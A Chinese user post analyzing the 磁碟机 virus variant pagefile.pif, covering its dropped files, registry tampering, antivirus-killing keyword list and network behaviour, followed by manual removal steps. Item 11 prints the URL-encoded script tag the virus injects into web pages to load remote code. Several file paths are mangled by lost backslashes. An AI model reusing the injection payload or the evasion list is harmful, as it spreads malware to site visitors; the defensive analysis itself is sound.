pagefile.pif
最近电脑突然卡,硬盘里突然多了许多个pagefile.pif和autorun.inf,都是系统文件和隐藏性质。
感觉不对,马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀
果然,瑞星报毒!!!
磁碟机新变种pagefile.pif的分析
技术细节:
1.病毒运行后,衍生如下文件或副本:
%systemroot%system32ComLSASS.EXE
%systemroot%system32Com
etcfg.000
%systemroot%system32Com
etcfg.dll
%systemroot%system32ComSMSS.EXE
C:WINDOWSsystem32894729.log(6位随机数字)
C:894729.log(6位随机数字)
C:WINDOWSsystem32dnsq.dll
C:WINDOWSsystem32
tfsus.exe
C:Documents and SettingsAll Users「开始」菜单程序启动~.exe(一定不要忘记)
或C:Documents and Settings用户名「开始」菜单程序启动~.exe
各个盘下面生成pagefile.pif和autorun.inf文件,达到通过移动存储传播的目的
2.添加启动项目
C:Documents and SettingsAll Users「开始」菜单程序启动~.exe
3.通过查找某些ieframe和mozillauiwindowclass名关闭带有某些关键字的IE窗口和火狐浏览器窗口
dr.web
avg
木
360safe
360anti
毒霸
antivir
费尔
微点
avp.tray
kvxp
查找带有某些关键字的子窗口名称,并将其关闭
sreng 介绍
*升级
还可能关闭带有某些关键字的进程
如avast
4.删除HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun下面所有启动项目
5.删除HKLMSYSTEMControlSet001ControlSafeBootMinimal
HKLMSYSTEMControlSet001ControlSafeBootNetwork
HKLMSYSTEMCurrentControlSetControlSafeBootMinimal
HKLMSYSTEMCurrentControlSetControlSafeBootNetwork
破坏安全模式
把HKUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden的值改为0x00000000
使得不能显示隐藏文件
6.查找文件名中带有360字样的文件 找到即在重启后将其删除
7.通过ping王朝网站查看是否联网
8.通过regsvr32.exe %systemroot%system32com
etcfg.dll /s注册netcfg.dll
并在
9.连接网络下载http://*.com/Stop.exe到system32文件夹 命名为ntfsus.exe
该病毒具有arp欺骗功能
10.感染exe文件(部分感染)且会通过自解压命令感染Rar和zip文件中的exe文件
被感染文件运行后会释放一个文件名.log的文件
11.感染htm html、asp、spx、php、jsp等网页文件 在其后面加入
{script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代码
感染.js文件
在其尾部加入
document.write("{ScRiPt src=''http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}")
的代码
12.后台连接某些网站刷流量
清除办法:
下载sreng: http://www.antidu.cn/board/helpst/
(怕麻烦的话,可以直接使用磁碟机免疫工具 http://www.antidu.cn/html/8/2008/1/antidu_20081785415.html)
1.删除以下文件:
%systemroot%system32ComLSASS.EXE
%systemroot%system32Com
etcfg.000
%systemroot%system32Com
etcfg.dll
%systemroot%system32ComSMSS.EXE
C:WINDOWSsystem32894729.log(6位随机数字)
C:894729.log(6位随机数字)
C:WINDOWSsystem32dnsq.dll
C:WINDOWSsystem32
tfsus.exe
C:Documents and SettingsAll Users「开始」菜单程序启动~.exe
2.重启计算机
打开sreng:系统修复 - Windows Shell/IE 全选 点击修复
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
在左边的资源管理器中单击打开系统所在盘
删除
C:pagefile.pif
c:autorun.inf
在左边的资源管理器中单击打开其他盘
删除pagefile.pif
autorun.inf
3.使用杀毒软件全盘杀毒 修复被感染的exe文件
4.修复被感染的htm等网页文件
专杀下载:http://dl.360safe.com/killer_cdj.exe 奇虎360磁碟机病毒专杀工具 V2.2